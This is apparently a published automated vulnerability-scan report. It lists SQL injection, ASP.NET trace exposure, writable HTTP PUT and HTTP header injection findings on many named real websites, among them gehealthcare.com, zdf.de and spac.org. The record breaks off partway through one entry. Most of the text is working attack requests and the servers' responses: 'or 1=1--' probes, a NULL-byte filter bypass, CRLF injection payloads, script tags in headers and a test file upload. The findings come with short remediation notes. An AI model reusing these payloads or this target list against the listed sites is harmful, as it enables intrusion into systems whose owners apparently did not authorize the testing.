XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, 05042011-02

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:

One common defence is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defence is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defence may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defence to be bypassed.
Another often cited defence is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.

1.1. http://www.gehealthcare.com/favicon.ico [REST URL parameter 1] next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.gehealthcare.com
Path:	/favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 14334019'%20or%201%3d1--%20 and 14334019'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /favicon.ico14334019'%20or%201%3d1--%20 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.gehealthcare.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response 1 (redirected)

HTTP/1.1 500 Server Error
Server: GE Healthcare Web Server
Date: Wed, 04 May 2011 03:43:25 GMT
Content-type: text/plain
Content-Length: 379

HTTP/1.1 100 Continue

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://www.amershambiosciences.com/APTRIX/upp01077.nsf/content/ten_percent">http://www.amershambiosciences.com/APTRIX/upp01077.nsf/content/ten_percent</a>.</p>
</body></html>

Request 2

GET /favicon.ico14334019'%20or%201%3d2--%20 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.gehealthcare.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response 2 (redirected)

HTTP/1.1 500 Server Error
Server: GE Healthcare Web Server
Date: Wed, 04 May 2011 03:43:26 GMT
Content-type: text/plain
Content-Length: 317

HTTP/1.1 100 Continue

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://www.gehealthcare.com/helpcenter.html">http://www.gehealthcare.com/helpcenter.html</a>.</p>
</body></html>

1.2. http://www.next-episode.net/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.next-episode.net
Path:	/favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 18962190'%20or%201%3d1--%20 and 18962190'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /favicon.ico18962190'%20or%201%3d1--%20 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.next-episode.net
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response 1

HTTP/1.1 301 Moved Permanently
Server: Exsisto
Date: Wed, 04 May 2011 01:18:34 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/4.4.9
Expires: Thu, 05 May 2011 01:18:34 GMT
Cache-Control: max-age=86400
Pragma: no-cache
Set-Cookie: PHPSESSID=5c47277356787bbbbb8835ff3b1c6128; path=/
location: http://next-episode.net
Vary: Accept-Encoding
Content-Length: 24891

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<meta name="keywords" content="Will & Grace,download,download episodes,download season,series,tv series,series schedule,download tv,tv episode,episodes,season,series episode guide,tv series episodes,tv show,tv show episode,tv show episode guide,tv show season,episodes schedule,episode season,tv show series,tv shows">
<meta name="description" content="Next-Episode.Net is your reference guide to Will & Grace Show. Will & Grace episodes schedule, forums, downloads, polls, calendar and more.">
<meta name="google-site-verification" content="hBGPxEsADuNmjT0hpyQn4DBwjdVd8CabGQcWd08mQJc" />
<link href="/style.css" rel="stylesheet" type="text/css">
<script type="text/javascript" src="/js/ajax/ajax_engine.js"></script>
<link rel="alternate" type="application/rss+xml" title="Next Episode News Feed" href="/rss_home.xml">
<link rel="shortcut icon" href="/favicon.ico" >
<title>Will & Grace TV Show - Download Will & Grace Episodes - Next-Episode.Net</title>
<link rel="image_src" href="http://next-episode.net/tv-show-image/favicon.ico18962190' or 1=1-- .jpg"></head>
<body>
<table width="960" border="0" align="center" cellpadding="0" cellspacing="0" class="main_table">
<tr>
<td height="25" colspan="2" align="left" valign="top" bgcolor="#ffffff"><table width="100%" border="0" cellspacing="0" cellpadding="0" id="header">
<tr>
<td width="81%" valign="bottom" class="td4"> <form name="
...[SNIP]...

Request 2

GET /favicon.ico18962190'%20or%201%3d2--%20 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.next-episode.net
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response 2

HTTP/1.1 404 Not Found
Server: Exsisto
Date: Wed, 04 May 2011 01:18:36 GMT
Content-Type: text/html
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/4.4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=9957ce01105f3d91329431af544881df; path=/
location: http://next-episode.net
Vary: Accept-Encoding
Content-Length: 51

Sorry. The url you are looking for is non existent.

1.3. http://www.spac.org/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.spac.org
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /?1'=1 HTTP/1.1
Host: www.spac.org
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=109962183.1304490783.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; __utma=109962183.2070296370.1304490783.1304490783.1304490783.1; __utmc=109962183; __utmb=109962183.1.10.1304490783

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Wed, 04 May 2011 01:36:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: PleskWin
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Content-type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-e
...[SNIP]...
</b>: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in <b>
...[SNIP]...

Request 2

GET /?1''=1 HTTP/1.1
Host: www.spac.org
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=109962183.1304490783.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; __utma=109962183.2070296370.1304490783.1304490783.1304490783.1; __utmc=109962183; __utmb=109962183.1.10.1304490783

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Wed, 04 May 2011 01:36:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: PleskWin
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Content-type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-e
...[SNIP]...

1.4. http://www.spac.org/favicon.ico [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.spac.org
Path:	/favicon.ico

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /favicon.ico?1'=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.spac.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 04 May 2011 01:08:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: PleskWin
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Content-type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-e
...[SNIP]...
</b>: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in <b>
...[SNIP]...

Request 2

GET /favicon.ico?1''=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.spac.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response 2 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 04 May 2011 01:08:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: PleskWin
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Content-type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-e
...[SNIP]...

1.5. http://www.themonroetimes.com/favicon.ico [User-Agent HTTP header] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.themonroetimes.com
Path:	/favicon.ico

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3'
Host: www.themonroetimes.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response 1

HTTP/1.1 500 Internal Server Error
Date: Wed, 04 May 2011 01:55:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 384
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSQABSDRQ=IAHMAOEANGBEDALJIAHOIAHB; path=/
Cache-control: private

<font face="Arial" size=2>
<p>Microsoft SQL Native Client</font> <font face="Arial" size=2>error '80040e14'</font>
<p>
<font face="Arial" size=2>Unclosed quotation mark after the character string 'curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 openssl/0.9.8o zlib/1.2.3''.</font>
...[SNIP]...

Request 2

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3''
Host: www.themonroetimes.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response 2

HTTP/1.1 404
Date: Wed, 04 May 2011 01:55:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 2414
Content-Type: text/html
Set-Cookie: UID=16606079; expires=Mon, 31-Dec-2012 05:00:00 GMT; path=/
Set-Cookie: UserPollID=0; expires=Mon, 31-Dec-2012 05:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDSQABSDRQ=KAHMAOEAFNCGHCNFEMKAHHNC; path=/
Cache-control: private

<html>
<head>
<title>Page Not Found - The Monroe Times</title>
<style type="text/css">
#goog-wm
{
color:#000000;
font-fami
...[SNIP]...

1.6. http://www.uiccu.org/favicon.ico [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.uiccu.org
Path:	/favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /favicon.ico?1'=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.uiccu.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response 1

HTTP/1.1 417 Expectation Failed
Date: Wed, 04 May 2011 00:52:03 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 389
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...

Request 2

GET /favicon.ico?1''=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.uiccu.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response 2

HTTP/1.1 404 Not Found
Server: nginx
Date: Wed, 04 May 2011 00:52:03 GMT
Content-Type: text/html; charset=iso-8859-1
Connection: keep-alive
Vary: Accept-Encoding
Vary: Accept-Encoding
Content-Length: 209

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /favicon.ico was not found on this server.</p>
</body
...[SNIP]...

1.7. http://www.zdf.de/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.zdf.de
Path:	/favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /favicon.ico%00' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.zdf.de
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response 1

HTTP/1.1 504 Gateway Time-out
Server: Footprint 4.6/FPMCP
Mime-Version: 1.0
Date: Wed, 04 May 2011 01:20:18 GMT
Content-Type: text/html
Content-Length: 772
Expires: Wed, 04 May 2011 01:20:18 GMT
Connection: keep-alive

<HTML><HEAD>
<TITLE>ERROR: The requested URL could not be retrieved</TITLE>
</HEAD><BODY>
<H1>ERROR</H1>
<H2>The requested URL could not be retrieved</H2>
<HR>
<P>
While trying to retrieve the request
...[SNIP]...

Request 2

GET /favicon.ico%00'' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.zdf.de
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response 2

HTTP/1.1 417 Expectation failed
Content-Length: 1026
Content-Type: text/html
Server: squid
X-Cache: MISS from www.zdf.de
X-Squid-Error: ERR_INVALID_REQ 0
Date: Wed, 04 May 2011 01:20:19 GMT
Connection: keep-alive

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<HTML><HEAD><META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<TITLE>ERROR
...[SNIP]...

2. ASP.NET tracing enabled previous next
There are 5 instances of this issue:

http://www.abbyy.com/trace.axd
http://www.archildrens.org/trace.axd
http://www.chartcrafters.com/trace.axd
http://www.egroupnet.com/trace.axd
http://www.meadonline.com/trace.axd

Issue background

ASP.NET tracing is a debugging feature which is designed for use during development to help troubleshoot problems. It discloses sensitive information to users, and if enabled in production contexts may present a serious security threat.

Application-level tracing enables any user to retrieve full details about recent requests to the application, including those of other users. This information includes session tokens and request parameters, which may enable an attacker to compromise other users and even take control of the entire application.

Page-level tracing returns the same information, but relating only to the current request. This may still contain sensitive data in session and server variables which would be of use to an attacker.

Issue remediation

To disable tracing, open the Web.config file for the application, and find the <trace> element within the <system.web> section. Either set the enabled attribute to "false" (to disable tracing) or set the localOnly attribute to "true" (to enable tracing only on the server itself).

Note that even with tracing disabled in this way, it is possible for individual pages to turn on page-level tracing either within the Page directive of the ASP.NET page, or programmatically through application code. If you observe tracing output only on some application pages, you should review the page source and the code behind, to find the reason why tracing is occurring.

It is strongly recommended that you refer to your platform's documentation relating to this issue, and do not rely solely on the above remediation.

2.1. http://www.abbyy.com/trace.axd previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.abbyy.com
Path:	/trace.axd

Issue detail

ASP.NET tracing appears to be enabled at the application level.

Request

GET /trace.axd HTTP/1.0
Host: www.abbyy.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: UserGuid=PPq8YX0PzAEkAAAAYzc2NzkwYjUtYTIxMC00ZmM4LWJkYmMtOGNlYjhhOTE1NTUw0; expires=Wed, 11-May-2011 01:47:27 GMT; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:07:26 GMT
Connection: close
Content-Length: 4536

<html>
<head>
<style type="text/css">
span.tracecontent b { color:white }
span.tracecontent { background-color:white; color:black;font: 10pt verdana, arial; }
span.tracecontent table { clear:left
...[SNIP]...
<body>
<span class="tracecontent">
<table cellspacing="0" cellpadding="0" border="0" width="100%">
...[SNIP]...

2.2. http://www.archildrens.org/trace.axd previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.archildrens.org
Path:	/trace.axd

Issue detail

ASP.NET tracing appears to be enabled at the application level.

Request

GET /trace.axd HTTP/1.0
Host: www.archildrens.org

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:20:33 GMT
Connection: close
Content-Length: 21648

<html>
<head>
<style type="text/css">
span.tracecontent b { color:white }
span.tracecontent { background-color:white; color:black;font: 10pt verdana, arial; }
span.tracecontent table { clear:left
...[SNIP]...
<body>
<span class="tracecontent">
<table cellspacing="0" cellpadding="0" border="0" width="100%">
...[SNIP]...

2.3. http://www.chartcrafters.com/trace.axd previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.chartcrafters.com
Path:	/trace.axd

Issue detail

ASP.NET tracing appears to be enabled at the application level.

Request

GET /trace.axd HTTP/1.0
Host: www.chartcrafters.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 4661
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:12:22 GMT
Connection: close

<html>
<head>
<style type="text/css">
span.tracecontent b { color:white }
span.tracecontent { background-color:white; color:black;font: 10pt verdana, arial; }
span.tracecontent table { clear:left
...[SNIP]...
<body>
<span class="tracecontent">
<table cellspacing="0" cellpadding="0" border="0" width="100%">
...[SNIP]...

2.4. http://www.egroupnet.com/trace.axd previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.egroupnet.com
Path:	/trace.axd

Issue detail

ASP.NET tracing appears to be enabled at the application level.

Request

GET /trace.axd HTTP/1.0
Host: www.egroupnet.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 04 May 2011 03:41:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 4633

<html>
<head>
<style type="text/css">
span.tracecontent b { color:white }
span.tracecontent { background-color:white; color:black;font: 10pt verdana, arial; }
span.tracecontent table { clear:left
...[SNIP]...
<body>
<span class="tracecontent">
<table cellspacing="0" cellpadding="0" border="0" width="100%">
...[SNIP]...

2.5. http://www.meadonline.com/trace.axd previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.meadonline.com
Path:	/trace.axd

Issue detail

ASP.NET tracing appears to be enabled at the application level.

Request

GET /trace.axd HTTP/1.0
Host: www.meadonline.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 04 May 2011 02:43:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 4867

<html>
<head>
<style type="text/css">
span.tracecontent b { color:white }
span.tracecontent { background-color:white; color:black;font: 10pt verdana, arial; }
span.tracecontent table { clear:left
...[SNIP]...
<body>
<span class="tracecontent">
<table cellspacing="0" cellpadding="0" border="0" width="100%">
...[SNIP]...

3. HTTP PUT enabled previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.golfweb.ws
Path:	/favicon.ico

Issue detail

HTTP PUT is enabled on the web server. The file /17db922d7e1d7746.txt was uploaded to the server using the PUT verb, and the contents of the file were subsequently retrieved using the GET verb.

Issue background

The HTTP PUT method is used to upload data which is saved on the server at a user-supplied URL. If enabled, an attacker can place arbitrary, and potentially malicious, content into the application. Depending on the server's configuration, this may lead to compromise of other users (by uploading client-executable scripts), compromise of the server (by uploading server-executable code), or other attacks.

Issue remediation

You should refer to your platform's documentation to determine how to disable the HTTP PUT method on the server.

Request 1

PUT /17db922d7e1d7746.txt HTTP/1.0
Host: www.golfweb.ws
Content-Length: 16

a4825dc3a5e3b2ac

Response 1

HTTP/1.1 201 Created
Connection: close
Date: Wed, 04 May 2011 00:44:55 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Location: http://www.golfweb.ws/17db922d7e1d7746.txt
Content-Length: 0
Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, LOCK, UNLOCK

Request 2

GET /17db922d7e1d7746.txt HTTP/1.0
Host: www.golfweb.ws

Response 2

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 16
Content-Type: text/plain
Last-Modified: Wed, 04 May 2011 00:44:55 GMT
Accept-Ranges: bytes
ETag: W/"368c727cf49cc1:5ee"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 00:44:54 GMT
Connection: close

a4825dc3a5e3b2ac

4. HTTP header injection previous next
There are 7 instances of this issue:

http://www.all-sports-uniforms.com/favicon.ico [REST URL parameter 1]
http://www.criminal-info.com/favicon.ico [REST URL parameter 1]
http://www.deadcellzones.com/favicon.ico [REST URL parameter 1]
http://www.phonejobsathome.com/favicon.ico [REST URL parameter 1]
http://www.ptworkingathome.com/favicon.ico [REST URL parameter 1]
http://www.resumagic.com/favicon.ico [REST URL parameter 1]
http://www.solarmovie.com/favicon.ico [REST URL parameter 1]

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.

4.1. http://www.all-sports-uniforms.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.all-sports-uniforms.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 1698f%0d%0ab6f70370e42 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /1698f%0d%0ab6f70370e42 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.all-sports-uniforms.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/5.0
Date: Wed, 04 May 2011 03:00:17 GMT
Location: /1698f
b6f70370e42/

4.2. http://www.criminal-info.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.criminal-info.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload fedfb%0d%0aa55c0c94133 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /fedfb%0d%0aa55c0c94133 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.criminal-info.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/5.0
Date: Wed, 04 May 2011 04:22:22 GMT
Location: /fedfb
a55c0c94133/

4.3. http://www.deadcellzones.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.deadcellzones.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 5e6c0%0d%0aa3026e28090 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /5e6c0%0d%0aa3026e28090 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.deadcellzones.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/5.0
Date: Wed, 04 May 2011 03:48:52 GMT
Location: /5e6c0
a3026e28090/

4.4. http://www.phonejobsathome.com/favicon.ico [REST URL parameter 1] previous next

Summary

